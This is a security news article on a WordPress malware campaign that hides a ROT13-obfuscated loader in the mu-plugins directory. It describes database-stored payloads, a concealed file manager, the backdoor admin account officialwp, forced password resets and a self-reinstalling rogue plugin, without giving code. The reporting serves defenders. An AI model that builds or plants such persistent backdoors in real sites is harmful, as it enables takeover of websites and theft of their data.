Security researchers have discovered a sophisticated malware campaign targeting WordPress websites by exploiting a little-known but powerful feature: the Must-Use (“mu-plugins”) plugins directory.
This method, previously observed in similar attacks earlier this year, is raising alarm among WordPress administrators due to its persistence and difficulty of detection.
ROT13 Obfuscation Aids Loader Stealth
The current attack centers on a discreetly placed file, wp-index.php, embedded in the wp-content/mu-plugins/ directory.
As must-use plugins, files in this location are automatically executed by WordPress and remain active without the ability to deactivate them through the standard admin dashboard.
The malicious loader employs ROT13 obfuscation a simple, reversible cipher using a 13-letter shift in the alphabet to conceal a remote URL. This obfuscation, while trivial to reverse, helps evade casual inspection and basic automated scans.
Once the loader decodes the ROT13 string, it fetches a payload from the remote resource, temporarily stores the content as a base64-encoded string inside a WordPress database option (_hdra_core), and dynamically executes the code.
The loader writes the payload to a temporary PHP file in the uploads directory, includes it for execution, and then deletes the file almost immediately a tactic designed to minimize forensic traces on disk.
Upon analysis, the retrieved payload hosted on the attacker-controlled cron.php resource revealed a multi-faceted malware framework.
Notably, it injects a concealed file manager script into a theme directory, granting attackers ongoing access to file operations like browsing, uploading, and deleting. This file manager is protected by a hardcoded HTTP header token.
To expand control and maintain persistence, the malware creates a new administrator-level user, officialwp, and forcibly sets or resets passwords associated with common admin usernames, including admin, root, wpsupport, and the newly created backdoor account.
By programmatically resetting passwords to attacker-controlled values, adversaries ensure they can regain privileged access even if legitimate administrators attempt to remediate the breach.
Further, the malware downloads and activates an additional rogue plugin (wp-bot-protect.php) from another obfuscated URL.
This component acts as a secondary backdoor and self-healing mechanism, reinstating the infection should cleanup efforts target only the initial loader.
Potential Impact
With full administrator privileges, attackers can deploy additional malware, alter website content, or exfiltrate sensitive data.
According to Sucuri, the ability to execute arbitrary PHP code remotely enables ongoing command execution and further adaptation of attack techniques.
Website owners face heightened risk, including defacement, data breaches, ransomware deployment, or inclusion in broader botnet attacks against third-party targets.
What makes this campaign particularly concerning is its combination of deep persistence leveraging mu-plugins for automatic execution and database-based payload storage with mechanisms to conceal indicators of compromise, bypass common defenses, and actively resist standard cleanup actions.
By disguising communications through simple obfuscation and removing traces after code execution, the threat actors have constructed a resilient and surreptitious backdoor.
In light of these findings, security professionals and site administrators are urged to audit the mu-plugins directory, review user accounts for unauthorized administrators, and scan for unexpected database options or hidden payloads within the WordPress environment.
Swift detection and remediation are critical as attackers continue to refine and deploy discreet backdoors into the WordPress ecosystem.
